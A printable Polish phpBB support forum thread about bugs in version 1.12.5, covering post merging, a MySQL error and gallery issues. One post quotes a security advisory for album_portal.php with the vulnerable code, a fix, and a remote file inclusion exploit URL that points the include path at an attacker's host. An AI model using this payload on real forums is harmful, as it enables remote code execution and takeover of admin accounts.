To jest tylko wersja do druku, aby zobaczyć pełną wersję tematu, kliknij TUTAJ
phpBB2 by Przemo
Support forów phpBB2 modified by Przemo

Ogłoszenia - Błędy wersji 1.12.5

chelloPL - 01-09-2006, 21:07

mix, tak, to jest właśnie scalanie kilku postów pisanych pod rząd przez tego samego użytkownika w 1 post.
mix napisał/a:
Oraz czy nie przydała by się na stronie głównej forum opcja " Oznacz wszystkie jako przeczytane"

Jest, ale jeśli jej nie widzisz, to szukaj jej pod forami...

mix - 02-09-2006, 14:01

chelloPL napisał/a:
mix, tak, to jest właśnie scalanie kilku postów pisanych pod rząd przez tego samego użytkownika w 1 post.


Tak wszystko jasne ale jak ten użytkownik dopisał drugiego posta po jakimś czasie (pod pierwszym) lub odrazu to czemu jak ktoś wejdzie na forum nie widzi tego drugiego posta jako nowego(nie wyświetla ,że jest nowy tylko działa to tak jagby ktoś edytował post).Wtedy ludzie nie zauważają ,że ktoś coś dopisał do innego posta(tylko scala jagby nigdy nic).Z tego co wiem na innych forach działa właśnie to tak że jak ktoś dopisał coś po czasie i scaliło to pokazuje cały scalony post jako nowy ,aby użytkownicy mogli zauważyć ,że coś zostało dodane.A na tym forum poprostu posty scala ze sobą jak edycje posta nie informując ,że coś ktoś dopisał pod dołem ( co scaliło się w 1 post).A po za tym reszta w tej opcji działa...

chelloPL napisał/a:
Jest, ale jeśli jej nie widzisz, to szukaj jej pod forami...


U mnie na stronie głównej jej wogóle nie ma tak jak na innych forach na których patrzyłem.Natomiast jest ona w każdym osobny dziale na forum w którym gdy klikniesz oznaczy w całym dziale posty za przeczytane ,a....... nie będe drugi raz tego samego pisał :P ważniejsza dla mnie jest ta pierwsza sprawa czy to nie działa czy u mnie na forum coś źle działa.... :lol: :mrgreen:

azwel - 03-09-2006, 19:31

Jak ktoś się zarejestruje, ale nie aktywuje konta to w profilu wyświetla czas ostatniej wizyty "Nigdy", ale pokazuje ip, to samo co przy rejestracji.
chelloPL - 04-09-2006, 12:36

mix napisał/a:
Wtedy ludzie nie zauważają ,że ktoś coś dopisał do innego posta

Jest to celowe. Wredne osoby celowo będą dopisywać po 3 litery, aby ich posty ciągle były nieprzeczytane, a użytkowników będzie to tylko wkurzać. Ale jeśli chcesz koniecznie, to poszukaj - na forum jest odpowiednia modyfikacja.
mix napisał/a:
U mnie na stronie głównej jej wogóle nie ma

Kod:
Name Error: The domain name does not exist.

Nic dziwnego.
BTW,
Aby uzyskać pomoc wymagany jest adres forum z problemem.
Podaj pełny, realny adres forum, z http:// (klikalny!), nie używaj aliasów.
Adres ma być w profilu lub w treści posta.
Jesli masz kilka forów, napisz którego problem dotyczy!

Jeśli tego nie zrobisz Twój post zostanie usunięty!

mix - 05-09-2006, 13:00

chelloPL napisał/a:
na forum jest odpowiednia modyfikacja.


Znalazłem , nie oto chodziło ,ale w ostateczności też może być... :mrgreen:

vysoki - 05-09-2006, 14:26

chelloPL napisał/a:
na forum jest odpowiednia modyfikacja.

Jest kilka - ale żadna nie jest tym, o co chodzi.
Jedna oznacza jako nieprzeczytany po edycji (kilka opcji do wyboru); inna zaś zapobiega łączeniu postów, jeśli poprzedni był wysłany wcześniej niż 24h temu. A co, jeśli chcielibyśmy, aby posty były, owszem, scalane, ale jednocześnie oznaczane jako nieprzeczytane?

Tak, używalem szukaj, zadałem pytanie, szukałem w FAQ - znalazłem tylko to, o czym pisałem powyżej; takiego moda, na jakim mi zależy, nie.

A co do błędów - czym może być spowodowane wyświetlanie błędu MySQL 2013? Administrator serwera twierdzi, że to wina konfiguracji, ale ostatnia zmiana konfiguracyjna była poczyniona mniej-więcej miesiąc przed wystąpieniem tego błędu, więc powinna być stabilna. Wersja serwera też się nie zmieniła (przynajmniej w cPanelu brak info o tym).

Crack - 05-09-2006, 21:46

MySQL error 2013: http://www.vbulletin.com/...=&postid=310265 , przedostatni post, jeśli to nie pomoże to przeczytaj resztę tamtego tematu.
S3w0 - 06-09-2006, 15:05

Kod:
Version: v1.8
Vendor: http://przemo.org/phpBB2/
Discover by: Officerrr <officerrr at poligon.com.pl>
Vendor Response: Not contacted yet...
Severity: Medium (arbitary code execution as webserver user)
- --====----====----====----====----====----====----====----====----====----===--
Description:

This modification is based on phpBB 2.0.X script, it contains about
200 add-ons, with ability to switch off any of them in admin`s panel.
- --====----====----====----====----====----====----====----====----====----===--
Vulnerable code:
File: album_portal.php

[code]
$album_root_path = $phpbb_root_path . 'album_mod/';
include($album_root_path . 'album_common.'.$phpEx);
[/code]
- --====----====----====----====----====----====----====----====----====----===--
Fix:

Change the following lines in album_portal.php file

[code]
$album_root_path = $phpbb_root_path . 'album_mod/';
include($album_root_path . 'album_common.'.$phpEx);
[/code]

to

[code]
define('IN_PHPBB', true);
$phpbb_root_path = './';
$album_root_path = $phpbb_root_path . 'album_mod/';
include($phpbb_root_path . 'extension.inc');
include($album_root_path . 'album_common.'.$phpEx);
[/code]
- --====----====----====----====----====----====----====----====----====----===--
Exploit:
http://[victim_host]/album_portal.php?phpbb_root_path=http://[evil_host]/&phpEx=/../../[evil_file.php]

evil_file.php must exist on the evil_host.


Ktoś mi wkleił ten kod w temacie, a po 24h miał już ten H*J hasło do panela


PROSZE O ADMINA LUB ZNAWCE OD PHP O POPRAWKE ZEBHY BYLE D**PEK NIE MÓGŁ WEJŚĆ NA DO PA

Przemo - 06-09-2006, 15:26

To jest dziura z przed roku conajmniej, jak pisze, do wersji 1.8
vysoki - 06-09-2006, 19:17

Dzięki Crack, właśnie w tym tkwi problem. 'wait_timeout' na 10...
iceangel - 08-09-2006, 09:53

co z mozliwoscia dodawania albumow w galerii a nie kategorii? ten problem ciagnie sie od 3 wersji. Zainstalowalam forum na czysto, dodaje album i nici z tego
sraken1 - 12-09-2006, 19:12

dziwna praktyka omijania trudnych problemow na tym forum... ktory to juz raz ;] pare postow wczesniej opisany problem ze skryptem na synchronizacje
S3w0 - 13-09-2006, 18:56

Przemo, tyle ze ja mam najnowszą versje, sam się dziwie :shock:
l0ud - 15-09-2006, 12:15

Odświeżam temat - na czym polega ta dziura w komentarzach w downloadzie?
Bo widzę że poprawka jest krytyczna, czyli to coś poważnego?

Paszczak000 - 15-09-2006, 13:16

l0ud napisał/a:
czyli to coś poważnego?

Tak i nie powiemy Ci jak ją wykorzystać :)



Powered by phpBB modified by Przemo © 2003 phpBB Group